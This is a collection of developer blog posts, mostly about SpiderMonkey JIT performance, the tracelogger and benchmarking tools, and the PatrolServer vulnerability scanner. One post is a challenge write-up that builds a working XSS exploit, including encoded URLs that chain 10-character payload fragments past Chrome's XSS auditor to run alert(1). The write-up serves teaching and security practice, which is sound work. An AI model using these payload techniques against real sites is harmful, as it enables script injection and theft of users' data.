Performance improvements to tracelogger

Tracelogger is a tool to create traces of the JS engine to investigate or visualize performance issues in SpiderMonkey. Steve Fink has recently been using it to dive into google docs performance and has been hitting some road blocks. The UI became unresponsive and crashing the browser wasn’t uncommon. This is unacceptable and it urged me to improve the performance!


I looked at the generated log files which were not unacceptable large. The log itself contained 3 million logged items, while I was able to visualize 12 million logged items. The cheer number of logged items was not the cause. I knew that creating the fancy graphs were also not the problem. They have been optimized quite heavily already. That only left the overview as a possible problem.

The overview pane gives an overview of the engines / sub parts we spend time in. Beneath it we see the same, but for the scripts. The computation of this runs in a web worker to not make the browser unresponsive. Once in a while the worker gives back the partial result which the browser renders.

The issue was in the rendering of the partial result. We update this table every time the worker has finished a chunk. Generating the table is generally fast for the workloads I was testing, since there weren’t a lot of different scripts. Though running the full browser gave a lot of different scripts. As a result updating the table became a big overhead. Also you need to know this could happen every 1ms.

The first fix was to make sure we only update this table every 100ms. This is a nice trade-off between seeing the newest information and not making the browser unresponsive. This resulted in far fewer calls to update the table. Up to 100x less.

The next thing I did was to delay the creation of the table. Instead of creating a table it now shows a textual representation of the data. Only upon when the computation is complete it will show the sortable table. This was 10x to 100x faster.

Screenshot of tracelogger

In most cases the UI is now possible to generate the temporary view in 1ms. Though I didn’t want to take any chances. As a result if generating the temporary view takes longer than 100ms it will stop live updating the temporary view and only show the result when finished.

Lastly I also fixed a memory issue. A tracelog log is a tree of where time is spend. This is parsed breadth-first. That is better since it will give a quite good representation quite quickly, even if all the small logged items are not processed yet. But this means the UI needs to keep track of which items will get processed in the next round. This list of items could get unwieldy large. This is now solved by switching to dept-first traversal when that happens. Dept-first traversal needs no additional state to traverse the tree. In my testcase it previously went to 2gb and crashed. With this change the maximum needed memory I saw was 1.2gb and no crash.

Everything has landed in the github repo. Everybody using the tracelogger is advised to pull the newest version and experience the improved performance. As always feel free to report new issues or to contribute in making tracelogger even better.


Tracelogger gui updates

Tracelogger is one of the tools JIT devs (especially me) use to look into performance issues and to improve the JS engine of Firefox performance-wise. It traces which functions are executing together with extra information like which engine is running. How long compilation took. How many times we are GC’ing and if we are calling VM functions …

I made the GUI a bit more powerful. First of all I moved the computation of the overview to a web worker. This should help the usability of the tool. Next to that I made it possible to toggle the categories on and off. That might make it easier to understand the graphs. I also introduced a settings popup. In the settings popup you can now choice to see absolute (cpu ticks) or relative (%) timings.

Screenshot from 2016-05-03 09:36:41

There are still a lot of improvements that are possible. Eventually it should be possible to zoom on graphs, toggle scripts on/off, see full times of scripts (instead of self time only) and maybe make it possible to show another graph (like a flame chart). Hopefully one day.

This is off course open source and available at:

Perfherder and regression alerts

In the dawn of arewefastyet only 2 machines were running and only three benchmarks were important. At that time it was quite easy to just iterate the different benchmarks once in a while and spot the regressions. Things have come a long way since. Due to the enormous increase in number of benchmarks and machines I created a regression detector, which wasn’t as easy as it sounds. False positives and false negative are the enemy of such a system. Bimodal benchmarks, noise, compiler perturbations, the amount of datapoints … all didn’t help. Also this had low priority, given I’m supposed to work on  improving JIT performance and not recording JIT performance.

Perfherder came along, which aims to collect any performance data in a central place and to act on that information. Which has some dedicated people working on it. Since the beginning of 2016 AWFY has started to use that system more and more. We have been sending the performance data to Perfherder for a few months now and Perfherder has been improving to allow more and more functionality AWFY needs. Switching the regression detection from AWFY to Perfherder is coming closer, which will remove my largest time drain and allow me to focus even more on the JIT compiler!

The alerts perfherder creates are visible at:

Since last week we now can request alerts on the subscores of benchmark, which is quite important for JS benchmarks. Octane has a variance of about 2% and a subscore of the benchmark that regresses with 10% will only decrease the full benchmark score with 1%. As a result this is within the noise levels and won’t get detected. This week this feature was enabled on AWFY, which will increase the correctness and completeness of the alerts Perfherder creates.

I want to thank Joel Maher and William Lachance with the help of this.


AWFY now comparing across OS

At the end of last year (2015) we had performance numbers of Firefox compared to the other browser vendors in the shell and on windows 8 and Mac OSX in the browser on different hardware.

This opened requests for better information. We didn’t have any information if Firefox on windows was slower compared to other OS on the same hardware. Also we got requests to run Windows 10 and also to compare to the Edge browser.

Due to these request we decided to find a way to run all OS on the same specification of hardware. In order to do that we ordered 3 mac mini’s and installed the latest flavors of Windows, Mac OSX and Ubuntu on it. Afterwards we got our AWFY slave on each machine and started reporting to the same graph.

Compare OS

Finally we have Edge performance numbers. Their new engine isn’t sub-par with other JS engines. It is quite good! Though there are some side-notes I need to attach to the numbers above. We cannot state enough that Sunspider is actually obsolete. It was a good benchmark at the start of the JS performance race. Now it is mostly annoying, since it is testing wrong things. Not the things you want to/should improve. Next to that octane is still a great benchmarks, except for mandreel latency. That benchmark is totally wrong and we notified the v8 team about it, but we got no response so far. ( It is quite sad to see our hard work devalued due to other vendors gaming on that benchmark.

We also have performance across OS for the first time. This showed us our octane score was lower on windows. Over the last few months we have been rectifying this. We still see some slower cold performance due to MSVC 2015 being less eager in inlining fuctions. But our jit performance should be similar across platform now!



PatrolServer 1.0.1

We at PatrolServer aim to increase security by decreasing vulnerability of public servers on the internet. Last week our product PatrolServer was released to the public in an open beta. This tool continuously monitors outdated software and exploits on your server and informs you.

During the last week, a lot of people have tried this tool and also provided us with vital feedback. We carefully listened to the complaints, suggestions and compliments and also tried to react to all of them. The feedback is greatly appreciated and we will continue to listen to any information of our early-adopters.

In this small timeframe we were able to address some of the comments raised and will implement other suggestions in upcoming releases. Keep your feedback flowing!

New Features:

chathelpWe upgraded our way to submit feedback from within PatrolServer itself by integrating Zendesk. This also has as nice feature that while we are online, we can chat with the original submitter to request more information or help immediately. Search for help or chat inside the tool.

aspnetFor the open beta we were focused on linux servers, since that is our domain and since most servers are served using linux servers. During the release we got some feedback to also support ASP.NET. Therefore we added preliminary support for ASP.NET. The extensiveness of this detection will improve in the future and also IIS is on the roadmap. Stay tuned while we add Microsoft support.


atSome people seem to forget to add any servers or forget to verify their servers. As a result they didn’t get any reports or updates about the vulnerability of their server. To combat this we now send a reminder to everybody that signed up but didn’t add any servers or forgot to verify their server.

smartphoneThe tool is adjusted to work on mobile phones. Here we must thank the people which reported the issues they had on their phones. Normally we should be fully responsive now!

lockWe also added some extra security measurements, e.g. like a country lock. That should make your account even safer.

Full changelog:
- Fix PHP error for older PHP versions with the PHP detector
- Initial support for ASP.NET
- Disable sending mails of outdated software to unverified servers.
- Add a priority to scanning of servers
- Fix overlapping content on mobile
- Add hostmaster as potential verification mailer
- Implement Zendesk support in app
- More aggressively detect php
- Add mailer for empty accounts or not verified servers
- Force ssl on login
- Add second cpe name for nginx
- Add outdated debian versions lenny, etch, sarge
- Ubuntu support for lucid ended and for vivid started
- Keep the cron working without overlap
- Add statistics page
- Stress test: add 25.000 scans simultaneously
- Added more information about our company in the footer
- Added support for versions:
 * mysql: 5.5.43-0ubuntu0.14.10.2, 5.5.43-0ubuntu0.14.04.2,
          5.6.19-1~exp1ubuntu2.1, 5.6.19-0ubuntu0.14.04.2,
          5.5.44-0ubuntu0.14.10.1, 5.5.44-0ubuntu0.14.04.1,
          5.5.44-0ubuntu0.12.04.1, 5.6.19-0ubuntu0.14.04.3,
 * openssl: 1.0.1p, 1.0.2d
 * php: 5.6.11, 5.5.27, 5.4.43, 5.5.12+dfsg-2ubuntu4.6,
        5.5.9+dfsg-1ubuntu4.11, 5.3.10-1ubuntu3.19
 * apache: 2.4.16, 2.2.31
 * nginx: 1.9.3, 1.6.2-5ubuntu3.1

We hope to address your issue soonish,
The PatrolServer team

In the land of XSS ‘possibly safe’ means ‘exploitable’

XSS (or cross-site scripting) is an attack found in web applications, where malicious people try to inject data into websites in order to steal sensitive data. Despite efforts to decrease the opportunities it still is one of the most used attacks.

Detectify posted an XSS challenge related to a real case they found. The challenge, called “twins of ten”, checks every input and only allows 10 characters per input. To make the challenge even more fun they also required that the solution works with the chrome XSS auditor. This tool is used in Chrome to combat XSS exploits at the users side.

In the challenge one need to break the following php script (which emulates the found issue):

$q = urldecode($_SERVER['QUERY_STRING']);
$qs = explode('&', $q);
$qa = array();
$chars = 0;
foreach($qs as $q) {
	$q = explode('=', $q);
	$s = implode('=', $q);
	if(strlen($s) > 10) continue;
	$chars += strlen($s);
	$qa[] = $s;
foreach($qa as $q) {
	echo "<0123$q><b x=\"x\">foo</b></0123$q>";
echo '<!-- '.$chars.' chars long -->';

In this script the input is checked, but not good enough. The authors thought it would be safe to only make sure the inputs are 10 characters long. Ten characters is awfully little. The reasoning behinds this limit is probably along the line that the limit means it is almost impossible to attack. Though if we know something about hackers is that they are perseverant and a little potential crack is enough to get them interested and try to find a way to break it. This also applies to this script and we are going to prove it!

How can we exploit this?

When we go to the web page we can adjust some of the parameters with arbitrary data. The only constraint is that every value can only be 10 characters long:


This request will generate the following html code. It is visible that the values are injected into the html code without any alteration or checking of values:

<0123{1}><b x="x">foo</b></0123{1}><0123{2}><b x="x">foo</b></0123{2}><0123{3}><b x="x">foo</b></0123{3}><0123{4}><b x="x">foo</b></0123{4}>

Our goal is to adjust {1} to {n} and eventually show we can run arbitrary javascript code. For this example we will try to alert something:


Now before going further I would encourage everybody to think about this issue and try it out. It is a fun brain teaser, especially the part to fool the chrome XSS detector. The rest of the post is about a solution I found.

The first thing one need to try is to get a place within a script-tag where we can inject some javascript code. In this example there is no script-tag present, so we are responsible to inject a script-tag ourself. Let’s try this by splitting the tags over different inputs. If we do {1} => “><script>” and {2} => “></script>” we will get:

<0123><script>><b x="x">foo</b></0123><script>><0123></script>><b x="x">foo</b></0123></script>>

This brings us closer. We injected a script open and close tag. That is already good. Only the code inside the tags are nonsense. We need to come up with a way to sanitize this. Due to the limit we don’t have a lot of wiggle room. In most languages there is something to comment the code, e.g. /*, //, <!–. So lets have a look if we can use that here:

{1} => "><script>/*"
{2} => "*/</script>"
<0123><script>/*><b x="x">foo</b></0123><script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

This seems to work. We successfully made the code valid by putting the in between html tag become comments. Though we need to address two things.

1) The first item ({1}) is actually 11 characters. This will fail, since only 10 characters are allowed. Luckily for us we can abuse the system a bit, since we can remove the first ‘>’. Almost all browsers will assume the first <0123 actually wasn’t a tag and the user forgot to use &lt;

{1} => "<script>/*"
{2} => "*/</script>"
<0123<script>/*><b x="x">foo</b></0123<script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

Which fixes the first issue.

2) Chrome has an XSS auditor in the browser that with some heuristics tries to detects injected javascript code and stops the attack. This measure is to protect their users to make sure that even if a website is vulnerable, the user is still protected. This examples triggers the auditor and as a result the code in between the tags won’t get executed.

The same happens when trying:

{1} => "<script>//"
{2} => "\n</script>"
<0123<script>//><b x="x">foo</b></0123<script>//><0123
</script>><b x="x">foo</b></0123

So the hard part about the challenge here was to fool the chrome auditor. There are a lot of examples on how to fool the auditor, but most are already outdated. Chrome improves their auditor, making it harder every time. Though since this is based on heuristics we might find a way to fool the browser.

As a result I searched a bit to get more information about the auditor:

The last link even has some examples that are still possible with the newest chrome release. But I couldn’t use them in my example. But I learned some tricks to fool the auditor. It seems that the content inside the script-tag is compared with the provided input and when that is found it will fail. Also it sometimes doesn’t look at anything behind the “//”. And one need to make sure that most of the code is actually original code, not related the parameters.

I had to try a lot of possible inputs that didn’t fool the auditor, had to almost give up a couple of times, try again, see the auditor calling my bluffs again, reiterating, before I could finally find a snippit that worked.

In order to achieve an attack, I had to fool the auditor that the existing code wasn’t removed, but was still part of the javascript code. That was the reason comments didn’t work. I found that creating unused strings out of them was a strategy the auditor didn’t detect (yet?):

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
;'+><0123'</script><b x="x">foo</b></0123'</script>

So anything we put in {2} after the newline is javascript code that will run. We don’t have much space, since we only have 10 characters and we already use 5 characters to ‘remove’ the extra html code. So we have 5 characters to do something. Another issue that we need to work around is the fact that every 5 characters we write will get executed twice. So we cannot do anything that would be wrong when getting executed twice. But given those constraints we can repeat {2} multiple times to finally start executing vulnerable code.

{2} => "'\nXXXXX;'+"

In order to do this there are probably multiple ways. I went with the idea to create the string “alert”. Which is doable in only 5 characters:

a='a' // 5 chars
l='l' // 5 chars
e='e' // 5 chars
r='r' // 5 chars
t='t' // 5 chars
b=a+l // 5 chars
c=b+e // 5 chars
d=c+r // 5 chars
e=d+t // 5 chars; e now contains "alert"

Now the issues start into invoking the string. It is possible to do this[a] which will return the alert function instead given the string alert. That seems good, but we need 6 characters for this:

t=this // 6 chars;
s=t[e] // 6 chars; s now contains the function alert

s(1) // 4 chars; alert(1)!!! 

Here I went and thought back about the issue why we didn’t use comments instead of strings to hide the existing html tags. We wanted to fool the auditor. Now it seems that after our first little hack, the third input doesn’t need this special format. We fooled the auditor and our third parameter had a little bit of more freedom. As a result I could transform the input to:

{3} => "'\nXXXXXX//"
{1} => "<script>//"
{2} => "'\nfoo1;'+"
{3} => "'\nfoo2//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
foo1;'+><b x="x">foo</b></0123'
foo2//><b x="x">foo</b></0123'
foo2//><0123'</script><b x="x">foo</b></0123'</script>

Which meant there we have 6 characters at our disposal. Just the amount we needed. There is only one hurdle left. If we run the code with the small chunks listed above we will alert twice. That is not the intention. We want to only alert once. We need to remove the first or second occurrence.

I did this by promoting the first occurrence into the string I used to ‘remove’ the original code.

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "\\\nfoo2;'//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
foo2;'//><b x="x">foo</b></0123\
foo2;'//><0123'</script><b x="x">foo</b></0123'</script>

Putting this all together we get the following inputs:

{1}  => "<script>//"
{2}  => "'\na='a';'+"
{3}  => "'\nl='l';'+"
{4}  => "'\ne='e';'+"
{5}  => "'\nr='r';'+"
{6}  => "'\nt='t';'+"
{7}  => "'\nb=a+l;'+"
{8}  => "'\nc=b+e;'+"
{9}  => "'\nd=c+r;'+"
{10} => "'\ne=d+t;'+"
{11} => "'\nt=this//"
{12} => "'\nk=t[e]//"
{13} => "\\\nk(1);'//"
{14} => "'</script"

The php script at the beginning of this post can now get compromised just by running: example.php?a=<script>%2F%2F&a=%27%0Aa%3D%27a%27%3B%27%2B&a=%27%0Al%3D%27l%27%3B%27%2B&a=%27%0Ae%3D%27e%27%3B%27%2B&a=%27%0Ar%3D%27r%27%3B%27%2B&a=%27%0At%3D%27t%27%3B%27%2B&a=%27%0Ab%3Da%2Bl%3B%27%2B&a=%27%0Ac%3Db%2Be%3B%27%2B&a=%27%0Ad%3Dc%2Br%3B%27%2B&a=%27%0Ae%3Dd%2Bt%3B%27%2B&a=%27%0At%3Dthis%2F%2F&a=%27%0Ak%3Dt%5Be%5D%2F%2F&a=%5C%0Ak%281%29%3B%27%2F%2F&a=%27<%2Fscript

Edit: this isn’t the smallest possible attack. With some tricks it is possible to write up to 7 characters in a one go. As a result it is not needed to create a string for “alert” and execute it through “this”. But it shows some of the thinking and tricks that can be used to create an attack. The smallest set I found was:

{1}  => "<script>//"
{2}  => "'\n'+"
{3}  => "'\n//"
{4}  => "\ne=alert//"
{5}  => "\\\ne(1);'//"
{6}  => "'</script"

Which yields the following url: example.php?a=%3Cscript%3E%2F%2F&a=%27%0A%27%2B&a=%27%0A%2F%2F&a=%0Ae%3Dalert%2F%2F&a=%5C%0Ae%281%29%3B%27%2F%2F&a=%27%3C%2Fscript

Feel free to take the challenge to better my personal record and contact me on twitter using @patrolserver and I will update this post with your record and name and maybe even buy you a beer ;).

Aftermath of Logjam

Last week the logjam attack was disclosed. An attack on TLS which is used in many protocol including including HTTPS, SSH, IPsec, SMTPS … The attack relies on the fact that it is possible to negotiate inferior keys for the Diffie-Hellman key exchange. An nice explanation has been put together by cloudflare

We are currently creating PatrolServer, a webapp that will check servers for potential outdated software and possible exploits. This TLS attack was a nice welcome for us to test our capabilities and what we can expect from such a webapp. We created a small scanner where people could provide and test their website/server.

Since it was our first time, it took quite some time before our scanner was ready. We weren’t prepared and still had to make a small infrastructure for this one-off test and add a little bit of a decent layout. Half a day after the facts we were live and we could redirect people to our tool and hope they would fix their server.

“To measure is to know”Sir William Thomson

Our first objective on getting people to test their server went smoothly. Over three days we were just short of testing 2000 unique servers. In most cases their own server, but some people also were naughty enough to test corporate servers like google, gmail, banks, yahoo, reddit … We even had somebody out of Toledo (Spain) abusing the system to generate a list of all vulnerable sites. Upon detection he was off course banned. Some ideas came to mind like always returning either vulnerable or not vulnerable or even returning random results. Though we decided to just hide the results. Maybe we can do something alike next time. We also got a request on twitter ( to enable SNI hosts. Which we didn’t supported at the time. We want to thanks everybody that used the tool and the suggestions. Always appreciated.

“Those who have the privilege to know have the duty to act.” — Albert Einstein

The second objective, the paramount goal of our little startup, is to get people to fix their servers. The Open Web Application Security Project (OWASP) scored server misconfiguration and not updating servers on the fifth position in their top 10 web application security list. On our tool we saw a lot of servers were outdated. We saw that 30% of our tests returned an affected state.

A week later we reran the list to see how things have progressed and saw only one server that actually fixed the problem afterwards. That is quite low. People know their server has a problem, but they don’t act on it. We assume that is something we will also see in the full webapp. The biggest goal of PatrolServer, after reporting issues with a server, will be to engage people to fix the issues. How is a bigger question. We are still trying to figure that part out. We already have a lot of ideas, but also need to find the right balance between annoying people and being helpful about vulnerabilities. If you got a suggestion please let us know!

Closing remarks: PatrolServer is getting actively developed. The platform to detect outdated software is in place. We already have support for some software, but we still want to increase the list. The frontend has gotten some layout love, which isn’t quite finished yet. In the close future we will probably start a closed or open beta in order to get some early feedback. Anybody wanting to get notified about this milestone and/or anybody wanting to test drive the platform on their server can enter their email address here:

Year in review: Spidermonkey in 2014 part 3

In the first two parts I listed the major changes in the Javascript engine of Mozilla Firefox in 2014 and enumerated the major changes that happened starting from Firefox 29 till Firefox 34. In part 3 I will iterate the major changes in the JavaScript engine in the last two releases that were developed in 2014.

If you haven’t read the first parts yet, I would encourage you to do that first.
<- Year in review: Spidermonkey in 2014 part 1
<- Year in review: Spidermonkey in 2014 part 2

Firefox 35

JIT RegExp.prototype.exec and RegExp.prototype.test

When Firefox 32 was released the regular expression engine was replaced with Irregexp. The new engine had just like its predecessor a small jit where regular expressions get compiled to native code. And just like its predecessor the easiest way to embed the regular expression engine is to use C code. Consequently a normal execution of a regular expression looked as following. The js code goes into C code preparing the regular expression engine jit, whereafter the regular expression engine gets called. In this release we eliminated the middle step (the c code) and now jump directly from JS jit to regular expression jit, removing the overhead the c code provided when calling RegExp.prototype.exec or RegExp.prototype.test.

Read more about this in the bug report

GVN + UCE combined

Just like most compilers Ionmonkey has an optimization called Global Value Numbering (GVN). It tries to remove or replace redundant instructions. In our implementation it is also the place where most replaces based on inputs happen, like constant folding, identity removal … After this pass we run Unreachable Code Elimination (UCE), which eliminates branches which are never taken. Optimizations taking place during GVN can improve the efficiency of UCE. More folded instructions can increase how many code that can be found to be dead. On the other hand removed code can again make it possible for GVN to optimize some extra instructions. Before Firefox 35 we only ran both passes once. As a result we sometimes didn’t find the most optimal code. With this release GVN and UCE are now combined, making it possible to have the same optimizations as running GVN and UCE multiple times after each other, but doing so in only one pass.

Learn more about this in an explanatory video

Lazy linking when recompiling code

The compilation of Ion code happens in three phases. First we have the graph creation phase (happens in IonBuilder), afterwards we do all sort of optimizations on that graph, ending with a linking phase, which finishes the compilation. In this sequence only the optimizing part can be done off the main thread. The other two phases block execution of JavaScript code. Lazy linking is about improving the last phase. Currently linking happens eagerly. As soon as a graph is ready we will try to link it. Even if we won’t ever execute that code (again) or if it gets invalidated due to better types. With lazy linking we wait until we want to execute that code before linking.

Read more about this in the bug report.

Compile non-CNG functions

Compile and Go (CNG) functions give extra performance since the caller cannot modify objects on the scope chain between compilation and execution [1]. With this warranty compilers can optimize access to these objects better. Now IonMonkey can only compile such functions. Non-CNG were stuck in the baseline compiler. In Firefox 34 and 35 these limitations were mostly removed. Given our most important class of non-CNG functions are in addons and chrome content. This will give again a nice boost to performance of these.

Read more about this in the bug reports: bug 1064777, bug 1045529 and bug 911570

Firefox 36

Baseline compile generators

Like mentioned in part 1, Firefox 30 saw the introduction of ES6 generators. In that release only supported for the interpreter (our first tier) was added. This was because the initial implementation tried to support this feature touching as little code as possible. But this method also disabled support for higher tiers. Six releases later we are now proud to also have support for generators in our second tier, the baseline compiler and that even before ES6 is released.

Wingo did the beginning of this huge task and has written a blogpost about it.
Read the blogpost about support of compiling generators in Baseline

ES6 Symbols

For the first time in a very long time a new primitive type was added to the engine. This all has to do with the upcoming spec. of ES6 Symbols. Nexto null, undefined, boolean, number and string, symbol is now present on that list. A Symbol is a unique and immutable primitive value. Without going too deep it can enable hiding of properties or fix name clashes between properties. It also can helps with not breaking existing codebases when new property names to the language are introduced. Not immediately something people need to use, but it can open new and maybe better ways to do some things.

Read more about this in the developer reference
Stackoverflow: why bring symbols to JS

Selfhosting String.prototype.substr, String.prototype.substring and String.prototype.slice

In Firefox 20 the selfhosting infrastructure landed. Since that release we can implement JavaScript features in JavaScript itself, instead of writing it in C. During runtime this selfhosted function will just get executed like somebody would have scripted in JavaScript. The major improvement here is that we remove the overhead from calling from JavaScript out to C and back. This gave improvements for e.g. “ { /* … */})” since the C step was fully eliminated between calling the function and the function given in the argument. In this release substr, substring and slice are now also selfhosted. For these functions the speedup is mostly because the edge case checks (start is positive and length is smaller than string length) are now done in JavaScript and IonMonkey can reason about them and potentially remove those checks!

Read more about this in the bug report

Year in review: Spidermonkey in 2014 part 2

In the first part of this series I noted that the major changes in Spidermonkey in 2014 were about EcmaScript 6.0 compliance, JavaScript performance and GC improvements. I also enumerated the major changes that happened starting from Firefox 29 till Firefox 31 related to Spidermonkey. If you haven’t read the first part yet, I would encourage you to do that first. In part two I will continue iterating the major changes  from Firefox 32 till Firefox 34.

<- Year in review: Spidermonkey in 2014 part 1

Firefox 32

Recover instructions

During the Firefox 32 release recover instructions were introduced. This adds the possibility to do more aggressive optimizations in IonMonkey. Before we couldn’t eliminate some instructions since the result was needed if we had to switch back to a lower compiler tier (bailout from IonMonkey to Baseline). This new infrastructure makes it possible to recover the needed result by adding instructions to this bailout path. As a result, we still have the needed results to bailout, but don’t have to keep a normally unused instruction in the code stream.

Read more about this change
Read more about this in the bug report


Internally there has been a lot of discussion around the regular expression engine used in Spidermonkey. We used to use yarr, which is the regular expression engine of Webkit. Though there were some issues here. We sometimes got wrong results, there were security issues and yarr hasn’t been updated in a while. As a result we switched to irregexp, the regular expression engine in v8 (the JS engine in Chrome). In the long run this helps by having a more up to date engine, which has jit to jit support and is more actively tested for security issues.

Read more about this in the bug report

Keep Ion code during GC

Another achievement that landed in Firefox 29 was the ability to keep ionmonkey jit code during GC. This required Type  Inference changes. Type information (TI) was always cleared during GC and since ionmonkey code depends on it, the code became invalid and we had to throw the Ion code away. Since a few releases we can release Type information in chunks and since Firefox 32 we keep ionmonkey code that is active on the stack. This result in less bumps in performance during GC, since we don’t lose the Ion code.

Read more about this in the bug report

Generational GC

Already going back to 2011 Generational GC was announced. But it took a lot of work before finally accomplishing this. In Firefox 29 exact rooting landed, which was a prerequisite. Now we finally use a more advanced GC algorithm to collect the memory and this also paves the way for even more advanced GC algorithms. This narrowed the performance gap we had on the Octane benchmark compared to V8, which already had Generational GC.

Read more about this change

Firefox 33

8 bit strings

Since the first Spidermonkey release strings were always stored as a sequence of UTF-16 code units. So every string takes 16 bits per character. This is quite wasteful, since most of the strings don’t need the extended format and the characters actually fit nicely into 8 bits (Latin1 strings). From this release on strings will be stored in this smaller format when possible. The main idea was to decreases memory, but there were also some performance increases for string intensive tasks, since they now only need to operate over half the length.

Read more about this change

Firefox 34

ES6 template strings

ES6 will introduce something called template strings. These template strings are surrounded by backticks ( ` ) and among others will allow to create multi-line strings, which weren’t possible before. Template strings also enable to embed expressions into strings without using concatenation. Support for this feature has been introduced in Firefox 34.

Read more about ES6 template strings.

Copy on write

Some new optimization has been added regarding arrays. Before, when you copied an array, the JavaScript Engine had to copy every single item from the original array to the new array. Which can be an intensive operation for big arrays. In this release this pain has been decreased with the introduction of “Copy on write” arrays. In that case we only copy the content of an array when we start modifying the new array. That way we don’t need to allocate and copy the contents for arrays that get copied but not modified.

Read more about this in the bug report.

Inline global variable

A second optimization was about inlining constant global names and constant name access from singleton scope objects. This optimization will help performance for people having constant variables defined in the global scope. Instead of reading the constants out of memory every time the constant will get embedded into the code, just like if you would have written that constant. So now it is possible to have a “var DEBUG = false” and everywhere you test for DEBUG it will get replaced with ‘false’ and that branch will be removed.

Read more about this in the bug report

SIMD in asm.js

SIMD or Single Instruction Multiple Data makes it possible to execute the same operations on multiple inputs at the same time. Modern cpu’s already have support for this using 128-bits long vectors, but currently we don’t really have access to these speedups in JavaScript. SIMD.js is a proposition to expose this to JavaScript. In Firefox 34 experimental support (only available in Firefox Nightly builds) for these instructions in asm.js code were added. As a result making it possible to create code that can run up to 4x faster (Amdahl’s law) using SIMD. Now work is underway to fully optimize SIMD.js in all Ion-compiled JS. When this work is complete, and assuming continued progress in the standards committee, SIMD.js will be released to all Firefox users in a future version.

Read more about this change
Read more about this in the bug report
View the SIMD.js demos

Update: The next post in this series has been published:
Read part 3 of ‘Year in review: spidermonkey in 2014′ ->